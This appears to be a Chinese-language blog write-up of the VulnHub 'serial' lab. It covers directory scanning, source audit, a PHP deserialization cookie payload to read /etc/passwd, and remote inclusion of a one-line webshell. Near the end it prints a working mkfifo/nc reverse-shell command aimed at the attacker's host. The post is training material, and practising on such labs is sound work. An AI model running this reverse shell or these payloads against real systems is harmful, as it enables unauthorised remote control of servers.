serial---- vulnhub打靶

1.新建虚拟机,虚拟硬盘使用vulnhub下载提供的虚拟硬盘文件
2.打开虚拟机,扫描网段,确定IP(或者arp -a)
3.发现没有robots.txt,以及一些常见admin,www.zip目录文件,尝试扫目录

拿另一个工具扫一下看看多了一个

4.发现备份文件目录,下载源码
5.分析源码发现关键点在log.class.php中handler方法。可以尝试远程文件包含,并且index.php可以尝试反序列化

通过代码审计得知,首先index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出。

经过代码审计可构造payload,尝试读取passwd文件,payload如下

在本地开个小皮 在www下打开这个payload

base64解码 CTF在线工具-在线base编码|在线base解码|base16编码|base32编码|base64编码 (hiencode.com)

然后用burpsuite抓包

发送到重放器 修改cookie为刚才构造的payload.php 的etc/password编码后的结果

7.构造远程包含payload

既然存在文件包含,可以试一下远程文件包含,在本机网站根目录写了一个shell.txt脚本

然后在修改paylod.php尝试读取本地www目录下的shell.txt 里面的脚本

然后再访问一下paylod.php 将这个再去bp更换一下

成功执行一句话木马

7.反弹shell

kali开启监听 尝试回弹一个shell

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh±i+2>%261|nc+192.168.233.139+9090+>/tmp/f

🆗了

相关推荐
乘云数字DATABUFF1 天前
5分钟部署开源APM Databuff:OpenTelemetry全链路追踪入门实战
运维·后端
荣--3 天前
一键部署不是为了省时间 —— 它是把"买来的 PaaS"变成"自己的平台"的拐点
运维·zabbix·工程化·一键部署·平台化·边界设计
江华森3 天前
动手实战学 Docker — 从零到集群编排完全指南
运维
Avan_菜菜4 天前
FRP 内网穿透完整实战:从 HTTP 映射到 HTTPS 自签代理
运维·nginx·https
SelectDB5 天前
Litefuse 开源并推出单进程轻量模式,25 秒就能跑起来的 Agent 可观测与评估平台
运维·后端·自动化运维
XIAOHEZIcode6 天前
Linux系统鼠标偏移常见原因以及修复方案
linux·运维·游戏
用户0328472220707 天前
如何搭建本地yum源(上)
运维
大树8810 天前
金刚石散热越强,管路越先见顶
大数据·运维·服务器·人工智能·ai
摇滚侠10 天前
Linux CentOS7 rpm 安装 MySQL 5.7
linux·运维·mysql
霸道流氓气质10 天前
领域驱动设计(DDD)在 Spring Boot 微服务中的实践指南
运维·spring boot·微服务